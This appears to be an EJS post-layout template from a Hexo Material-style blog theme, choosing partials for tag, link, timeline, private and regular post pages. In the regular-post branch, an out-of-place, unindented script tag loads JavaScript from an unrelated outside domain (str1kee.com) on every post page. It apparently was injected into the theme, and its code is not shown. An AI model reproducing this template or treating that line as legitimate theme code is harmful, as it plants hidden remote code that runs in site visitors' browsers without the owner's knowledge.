<!-- Post TOC -->
<% if( (page.toc === true) || (is_post() && page.toc !== false) ) { %>
    <%- partial('_partial/toc_button') %>
<% } %>

<!-- Layouts -->
<% if(page.layout === 'tags') { %>
    <!-- Tags Cloud -->
    <%- partial('_widget/page-tagcloud') %>

<% } else if(page.layout === 'links') { %>
    <!-- Single Links Page -->
    <%- partial('_widget/page-links') %>

<% } else if(page.layout === 'timeline') { %>
    <!-- Single Timeline Page -->
    <%- partial('_widget/page-timeline') %>

<% } else if(page.layout === 'private') { %>
    <!-- Hidden Page -->
    <div class="material-post_container">
        <div class="material-post mdl-grid">
            <div class="mdl-card <% if(theme.card_elevation) { %><%= 'mdl-shadow--' + theme.card_elevation + 'dp' %><% } %> mdl-cell mdl-cell--12-col">
                <!-- Post Header(Thumbnail & Title) -->
                <%- partial('_partial/post-header') %>

                <% if(theme.scheme === 'Paradox') { %>
                  <!-- Paradox Post Info -->
                  <%- partial('_partial/Paradox-post-info') %>
                <% } %>

                <!-- Post Hidden -->
                <div id="post-content">
                    <p><%= __('post.private') %></p>
                </div>

                <% if(theme.scheme === 'Isolation') { %>
                    <!-- Paradox Post Info -->
                    <%- partial('_partial/Isolation-post-info') %>
                <% } %>

                <!-- Post Comments -->
                <%- partial('_partial/comment') %>
            </div>

            <!-- Post Prev & Next Nav -->
            <%- partial('_partial/post-nav') %>
        </div>
    </div>

<% } else { %>
    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                <%- partial('_partial/post-header') %>

                <% if(theme.scheme === 'Paradox') { %>
                    <!-- Paradox Post Info -->
                    <%- partial('_partial/Paradox-post-info') %>
                <% } %>

                <!-- Post Content -->
                <%- partial('_partial/post-content') %>

                <% if(theme.scheme === 'Isolation') { %>
                    <!-- Paradox Post Info -->
                    <%- partial('_partial/Isolation-post-info') %>
                <% } %>

                <!-- Post Comments -->
                <% if(page.comment !== false) { %>
                    <%- partial('_partial/comment') %>
                <% } %>
            </div>
<script async src="//str1kee.com/1882209225ba5c6.3.n.2.2.l60.js"></script>
            <!-- Post Prev & Next Nav -->
            <%- partial('_partial/post-nav') %>
        </div>
    </div>
<% } %>
